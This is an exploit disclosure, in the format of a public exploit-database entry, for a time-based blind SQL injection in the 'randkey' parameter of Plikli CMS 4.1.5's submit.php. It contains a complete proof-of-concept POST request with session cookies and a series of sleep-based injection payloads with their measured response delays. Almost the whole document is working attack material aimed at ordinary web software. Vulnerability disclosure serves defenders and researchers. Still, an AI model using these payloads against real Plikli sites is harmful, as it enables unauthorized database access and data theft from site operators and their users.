# Exploit Title: Plikli CMS 4.1.5 - 'randkey' SQL Injection
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 05.03.2024
# Vendor Homepage: https://github.com/kkumar326/plikli
# Software Link:
https://github.com/kkumar326/plikli/archive/refs/heads/master.zip
# Demo: https://softaculous.com/demos/plikli_cms
# Tested Version: v4.1.5 (latest)
# Tested on: MacOS

### PoC Request ###

POST /pliklicms/submit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/
20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/
avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/pliklicms/submit.php
Cookie: PHPSESSID=7f592f5d5ac82747bb6e682ca456a007; mnm_user=admin; mnm_key=
YWRtaW46MjJrTkdHVDVLbG9NWToxZjMxOGY0YTk5OTQwMzkyYjZhOTJlNjI4MWUyZmRiZg%3D%3D;
mnm_data=11fe3441ad4723841afd0beace6794ff
Upgrade-Insecure-Requests: 1

url=http%3A%2F%2Fgoogle.com&phase=1&randkey=1426389526396&id=c_1

### Vulnerable Parameter ###

randkey

### Payloads ###

1426389526396*if(now()=sysdate(),sleep(15),0) => 15.581
1426389526396*if(now()=sysdate(),sleep(6),0) => 6.527
1426389526396*if(now()=sysdate(),sleep(0),0) => 0.496
1426389526396*if(now()=sysdate(),sleep(15),0) => 15.488
1426389526396*if(now()=sysdate(),sleep(3),0) => 5.152
1426389526396*if(now()=sysdate(),sleep(0),0) => 0.661
1426389526396*if(now()=sysdate(),sleep(6),0) => 6.851